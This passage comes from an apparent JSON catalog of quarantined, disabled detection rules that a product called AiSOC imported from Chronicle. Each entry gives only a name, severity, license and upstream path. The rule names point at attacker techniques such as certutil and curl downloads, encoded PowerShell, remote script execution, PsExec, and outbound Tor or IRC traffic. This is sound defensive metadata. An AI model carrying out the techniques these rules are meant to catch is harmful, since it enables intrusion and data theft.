"chronicle-detection-rules-suspicious-command-service-control", "type": "detection", "name": "suspicious_command_service_control", "description": "suspicious_command_service_control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-service-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_service_control", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_service_control.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-shutdown", "type": "detection", "name": "suspicious_command_shutdown", "description": "suspicious_command_shutdown", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_shutdown", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_shutdown.yaral" } }, { "id": "chronicle-detection-rules-suspicious-commandline-escape", "type": "detection", "name": "suspicious_commandline_escape", "description": "suspicious_commandline_escape", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-commandline-escape.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_commandline_escape", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_commandline_escape.yaral" } }, { "id": "chronicle-detection-rules-suspicious-compression-tool-parameters", "type": "detection", "name": "suspicious_compression_tool_parameters", "description": "suspicious_compression_tool_parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-compression-tool-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_compression_tool_parameters", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_compression_tool_parameters.yaral" } }, { "id": "chronicle-detection-rules-suspicious-curl-exe-download", "type": "detection", "name": "suspicious_curl_exe_download", "description": "suspicious_curl_exe_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-curl-exe-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_curl_exe_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_curl_exe_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-curl-usage", "type": "detection", "name": "suspicious_curl_usage", "description": "suspicious_curl_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-curl-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_curl_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_curl_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-dns-query-with-b64-encoded-string", "type": "detection", "name": "suspicious_dns_query_with_b64_encoded_string", "description": "suspicious_dns_query_with_b64_encoded_string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-dns-query-with-b64-encoded-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_dns_query_with_b64_encoded_string", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/suspicious_dns_query_with_b64_encoded_string.yaral" } }, { "id": "chronicle-detection-rules-suspicious-double-extension", "type": "detection", "name": "suspicious_double_extension", "description": "suspicious_double_extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-double-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_double_extension", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_double_extension.yaral" } }, { "id": "chronicle-detection-rules-suspicious-download-via-certutil-exe", "type": "detection", "name": "suspicious_download_via_certutil_exe", "description": "suspicious_download_via_certutil_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-download-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_download_via_certutil_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_download_via_certutil_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-driver-load-from-temp", "type": "detection", "name": "suspicious_driver_load_from_temp", "description": "suspicious_driver_load_from_temp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-driver-load-from-temp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_driver_load_from_temp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_driver_load_from_temp.yaral" } }, { "id": "chronicle-detection-rules-suspicious-encoded-powershell-command-line", "type": "detection", "name": "suspicious_encoded_powershell_command_line", "description": "suspicious_encoded_powershell_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_encoded_powershell_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_encoded_powershell_command_line.yaral" } }, { "id": "chronicle-detection-rules-suspicious-entra-id-sign-in-external-call", "type": "detection", "name": "suspicious_entra_id_sign_in_external_call", "description": "suspicious_entra_id_sign_in_external_call", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-entra-id-sign-in-external-call.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_entra_id_sign_in_external_call", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/suspicious_entra_id_sign_in_external_call.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execute-remote-batch-script", "type": "detection", "name": "suspicious_execute_remote_batch_script", "description": "suspicious_execute_remote_batch_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execute-remote-batch-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execute_remote_batch_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/execute_remote_batch_script.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execute-remote-cscript", "type": "detection", "name": "suspicious_execute_remote_cscript", "description": "suspicious_execute_remote_cscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execute-remote-cscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execute_remote_cscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/execute_remote_cscript.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execution-from-outlook", "type": "detection", "name": "suspicious_execution_from_outlook", "description": "suspicious_execution_from_outlook", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execution-from-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execution_from_outlook", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_execution_from_outlook.yaral" } }, { "id": "chronicle-detection-rules-suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe", "type": "detection", "name": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "description": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-gup-usage", "type": "detection", "name": "suspicious_gup_usage", "description": "suspicious_gup_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-gup-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_gup_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_gup_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-hwp-sub-processes", "type": "detection", "name": "suspicious_hwp_sub_processes", "description": "suspicious_hwp_sub_processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-hwp-sub-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_hwp_sub_processes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_hwp_sub_processes.yaral" } }, { "id": "chronicle-detection-rules-suspicious-invoke-webrequest-execution", "type": "detection", "name": "suspicious_invoke_webrequest_execution", "description": "suspicious_invoke_webrequest_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-invoke-webrequest-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_invoke_webrequest_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_invoke_webrequest_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-msiexec-directory", "type": "detection", "name": "suspicious_msiexec_directory", "description": "suspicious_msiexec_directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-msiexec-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_msiexec_directory", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_msiexec_directory.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-elasticsearch", "type": "detection", "name": "suspicious_outbound_traffic_elasticsearch", "description": "suspicious_outbound_traffic_elasticsearch", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-elasticsearch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_elasticsearch", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_elasticsearch.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-irc", "type": "detection", "name": "suspicious_outbound_traffic_irc", "description": "suspicious_outbound_traffic_irc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-irc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_irc", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_irc.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-tor", "type": "detection", "name": "suspicious_outbound_traffic_tor", "description": "suspicious_outbound_traffic_tor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-tor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_tor", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_tor.yaral" } }, { "id": "chronicle-detection-rules-suspicious-parent-of-cscexe", "type": "detection", "name": "suspicious_parent_of_cscexe", "description": "suspicious_parent_of_cscexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-parent-of-cscexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_parent_of_cscexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_parent_of_csc_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-in-registry-run-keys", "type": "detection", "name": "suspicious_powershell_in_registry_run_keys", "description": "suspicious_powershell_in_registry_run_keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-in-registry-run-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_in_registry_run_keys", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_powershell_in_registry_run_keys.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-invocation-based-on-parent-process", "type": "detection", "name": "suspicious_powershell_invocation_based_on_parent_process", "description": "suspicious_powershell_invocation_based_on_parent_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-invocation-based-on-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_invocation_based_on_parent_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_invocation_based_on_parent_process.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-parameter-substring", "type": "detection", "name": "suspicious_powershell_parameter_substring", "description": "suspicious_powershell_parameter_substring", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-parameter-substring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_parameter_substring", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_parameter_substring.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-created-on-unusual-directories", "type": "detection", "name": "suspicious_process_created_on_unusual_directories", "description": "suspicious_process_created_on_unusual_directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-created-on-unusual-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_created_on_unusual_directories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_process_created_on_unusual_directories.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-creation", "type": "detection", "name": "suspicious_process_creation", "description": "suspicious_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_process_creation.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-start-locations", "type": "detection", "name": "suspicious_process_start_locations", "description": "suspicious_process_start_locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-start-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_start_locations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_process_start_locations.yaral" } }, { "id": "chronicle-detection-rules-suspicious-program-location-process-starts", "type": "detection", "name": "suspicious_program_location_process_starts", "description": "suspicious_program_location_process_starts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-program-location-process-starts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_program_location_process_starts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_program_location_process_starts.yaral" } }, { "id": "chronicle-detection-rules-suspicious-program-location-with-network-connections", "type": "detection", "name": "suspicious_program_location_with_network_connections", "description": "suspicious_program_location_with_network_connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-program-location-with-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_program_location_with_network_connections", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_program_location_with_network_connections.yaral" } }, { "id": "chronicle-detection-rules-suspicious-psexec-execution", "type": "detection", "name": "suspicious_psexec_execution", "description": "suspicious_psexec_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_psexec_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_psexec_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rasdial-activity", "type": "detection", "name": "suspicious_rasdial_activity", "description": "suspicious_rasdial_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rasdial-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rasdial_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rasdial_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rdp-redirect-using-tscon", "type": "detection", "name": "suspicious_rdp_redirect_using_tscon", "description": "suspicious_rdp_redirect_using_tscon", "version": "1.0.0", "author": "AiSOC", "tags": [ 